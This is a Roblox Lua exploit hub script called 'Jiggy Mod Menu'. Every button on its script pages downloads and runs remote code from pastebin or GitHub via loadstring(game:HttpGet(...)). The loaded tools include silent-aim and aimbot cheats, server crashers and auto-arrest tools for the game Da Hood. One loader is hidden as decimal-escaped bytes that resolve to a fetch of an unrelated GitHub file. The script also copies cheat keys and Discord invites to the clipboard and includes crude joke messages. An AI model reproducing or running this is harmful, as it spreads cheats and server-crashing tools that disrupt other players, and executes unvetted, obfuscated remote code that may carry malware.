loadstring(game:HttpGet("https://pastebin.com/raw/1mMWWDXE"))()
wait(0.5)
game.StarterGui:SetCore("ChatMakeSystemMessage", {
   Text = "[Notice] GUI Last Updated 5-20-21 , Hey Peter";
   Color = Color3.new(255, 0, 72);
   Font = Enum.Font.SourceSansBold;
   FontSize = Enum.FontSize.Size24;
})

game.StarterGui:SetCore("ChatMakeSystemMessage", {
   Text = "[Warning] By EXECUTING this GUI you are now a registered sex offender!";
   Color = Color3.new(255, 0, 0);
   Font = Enum.Font.SourceSansBold;
   FontSize = Enum.FontSize.Size24;
})



-- init
local library = loadstring(game:HttpGet("https://raw.githubusercontent.com/GreenDeno/Venyx-UI-Library/main/source.lua"))()
local venyx = library.new("Jiggy Mod Menu", 50139572)

-- themes
local themes = {
Background = Color3.fromRGB(24, 24, 24),
Glow = Color3.fromRGB(0, 0, 0),
Accent = Color3.fromRGB(10, 10, 10),
LightContrast = Color3.fromRGB(20, 20, 20),
DarkContrast = Color3.fromRGB(14, 14, 14),  
TextColor = Color3.fromRGB(255, 255, 255)
}

-- first page
local page = venyx:addPage("Best Scripts", 5012544693)
local section1 = page:addSection("Scripts")
local section2 = page:addSection("KeyBind")

section1:addButton("Valiant", function()
loadstring(game:HttpGet(("https://pastebin.com/raw/FMnCZbW5"), true))();
end)

section1:addButton("Swag Mode", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/lerkermer/lua-projects/master/SwagModeV002"))()
end)

section1:addButton("Swag Mode Old ", function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/lerkermer/lua-projects/master/OldSwagmode'))()
end)

section1:addButton("Ray Code Silent Aim ", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/racemodex/my-scripts/master/dahoodaimlock", true))()
end)

section1:addButton("Da-Hoodian Ware (Shitty Silent Aim)", function()
loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/Enviie/Cypher-X-DaHoodian-Ware/main/Cypher%20X%20DaHoodian-Ware%20Main.lua"))("Enviie Soo Hot!")
end)


section1:addButton("Silent Aim", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/0nly6Ex/wfwf/main/aimbot"))()
end)


section1:addButton("Da Hood Crasher", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/22kristina/dhcrash_gen2/main/crash", true))()
end)

section1:addButton("Da Hood Crashed 2", function()
loadstring(game:HttpGet("loadstring(game:HttpGet('https://raw.githubusercontent.com/lerkermer/lua-projects/master/SuperCustomServerCrasher'))()", true))()
end)






-- eith page
local page = venyx:addPage("Nooy X", 5012544693)
local section8 = page:addSection("Nooy X Gui")

section8:addButton("Nooy X", function()
loadstring(game:HttpGet("https://pastebin.com/raw/A0iqBB7d"))()
end)

section8:addButton("ONLY EXECUTE NOOY X  DO NOT EXECUTE ANY OTHER GUI", function()
print("Hi")
end)







-- thrid page
local page = venyx:addPage("Guis", 5012544693)
local section3 = page:addSection("Gui Page")
section3:addButton("LegacyX", function()
repeat
    wait();
until game:IsLoaded();
loadstring(game:HttpGet('https://raw.githubusercontent.com/Compwnter/LegacyX/main/script.lua'))();
end)

section3:addButton("LegacyX Key", function()
setclipboard("eb4bf712df7d227b64caf2ec06370fa962709cc49e624ba16627c58238acc83d")
end)

section3:addButton("Krypt", function()
repeat
wait()
until game:IsLoaded()
loadstring(game:HttpGet("https://raw.githubusercontent.com/0nly6Ex/krypt/main/loader"))()
end)


section3:addButton("Join Krypt Group To Use", function()
setclipboard("https://www.roblox.com/groups/9949037/Krypt-HQ#!/about")
end)



section3:addButton("Zordion", function()
repeat
wait()
until game:IsLoaded()
loadstring(game:HttpGet("https://raw.githubusercontent.com/0nly6Ex/zordion/main/script.lua"))()end)

section3:addButton("Zordion Key", function()
setclipboard("zordioniscool")
end)

section3:addButton("Faded", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/NighterEpic/Faded/main/YesEpic", true))()
end)



section3:addButton("RaycodeX", function()
loadstring(game:GetObjects("rbxassetid://5812737894")[1].Source)()
end)

section3:addButton("NightX", function()
loadstring(game:HttpGet(("https://pastebin.com/raw/u0Tg3PsM"), true))();
end)

section3:addButton("Lora X New", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/XptzExploits/dahood/main/loraxnew"))()
end)

section3:addButton("Lora X Old", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/XptzExploits/dahood/main/loraxold"))()
end)

section3:addButton("Lora X Old", function()
loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\51\97\99\107\101\114\104\115\52\47\97\115\100\97\100\115\97\100\107\105\100\115\47\109\97\105\110\47\82\69\65\68\77\69\46\109\100\39\41\44\116\114\117\101\41\41\40\41\32\10")()
end)

-- fourth page
local page = venyx:addPage("Solo Scripts", 5012544693)
local section4 = page:addSection("Script Page")

section4:addButton("Anti Stomp", function()
loadstring(game:HttpGet("https://pastebin.com/raw/hJTKLHvS"))()
end)

section4:addButton("Audio Logger", function()
loadstring(game:HttpGet("https://pastebin.com/raw/iXtePLpF"))()
end)

section4:addButton("Ray Code Cash Dropper", function()
loadstring(game:HttpGet(("https://raw.githubusercontent.com/Raycodex/Exploiting/main/Roblox/Da%20Hood%20Auto%20Cash%20Drop"), true))()
end)

section4:addButton("Ray Code Auto Arrest", function()
loadstring(game:HttpGet(("https://raw.githubusercontent.com/Raycodex/Exploiting/main/Roblox/Da%20Hood%20Auto%20Arrest"), true))()
end)




-- nine page
local page = venyx:addPage("Joitx Music Ids", 5012544693)
local section9 = page:addSection("Ids")

section9:addButton("Foolio - Neva Carded", function()
setclipboard("6820367896")
end)


section9:addButton("Yungeen Ace - Who I Smoke", function()
setclipboard("6835300373")
end)


section9:addButton("Annoying Orange - Full Kitchen Intruder", function()
setclipboard("6842701393")
end)




-- fith page
local page = venyx:addPage("Music Ids", 5012544693)
local section5 = page:addSection("Ids")

section5:addButton("Mexican BOP", function()
setclipboard("5972127403")
end)

section5:addButton("EMOTEGI - UNDER MY SKIN", function()
setclipboard("4498153931")
end)

section5:addButton("Alabama Neighbor", function()
setclipboard("6546444546")
end)

section5:addButton("BUSTER -$atori Zoom", function()
setclipboard("5971707317")
end)

section5:addButton("yameii - baby my phone", function()
setclipboard("6457694642")
end)

section5:addButton("C2D - With my hoe", function()
setclipboard("5790506499")
end)

section5:addButton("#BrooklynBloodPop", function()
setclipboard("6528607507")
end)

section5:addButton("XXXTENTACION x Trippie Red - Uh Oh, Thots!", function()
setclipboard("911974794")
end)

section5:addButton("Deadx - I Will Break My Own Heart", function()
setclipboard("5012734344")
end)

section5:addButton("Lieu - Drain", function()
setclipboard("6741212947 ")
end)

section5:addButton("Gasolina", function()
setclipboard("6785475822 ")
end)








section5:addButton("Jiggle Bells Dirty", function()
setclipboard("6784916972")
end)


section5:addButton("Weeekly(위클리) - After School (K-Pop)", function()
setclipboard("6556456475 ")
end)

section5:addButton("Annoying Orange - Fry Day", function()
setclipboard("6114352617 ")
end)


section5:addButton("Annoying Orange - ORANGE NYA NYA STYLE", function()
setclipboard("171420903 ")
end)



section5:addButton("Moan Song", function()
setclipboard("5682484168 ")
end)



-- sixth page
local page = venyx:addPage("Discord Invites", 5012544693)
local section6 = page:addSection("Servers")

section6:addButton("Legacyx Discord", function()
setclipboard("https://discord.io/legacyx")
end)

section6:addButton("RaycodeX Discord", function()
setclipboard("https://discord.gg/S3zZz9Zgdu")
end)

section6:addButton("Swagmode Discord", function()
setclipboard("https://discord.gg/gR2U2RpFXs")
end)

section6:addButton("Valiant Discord", function()
setclipboard("https://discord.gg/gR2U2RpFXs")
end)

section6:addButton("Cypher X Discord", function()
setclipboard("https://discord.com/invite/Q63u37Tctc")
end)

-- seventh page
local page = venyx:addPage("Change Logs", 5012544693)
local section7 = page:addSection("Updates")

section7:addButton("5-20-21 Last Updated", function()
print("5-20-21 Last Updated")
end)

section7:addButton("Added Nooy X & LittleKid Gui", function()
print("5-20-21 Last Updated")
end)









-- second page
local theme = venyx:addPage("Theme", 5012544693)
local colors = theme:addSection("Colors")

for theme, color in pairs(themes) do -- all in one theme changer, i know, im cool
colors:addColorPicker(theme, color, function(color3)
venyx:setTheme(theme, color3)
end)
end

section2:addKeybind("Toggle Keybind", Enum.KeyCode.KeypadOne, function()
venyx:toggle()
end, function()
end)

-- load
venyx:SelectPage(venyx.pages[1], true)
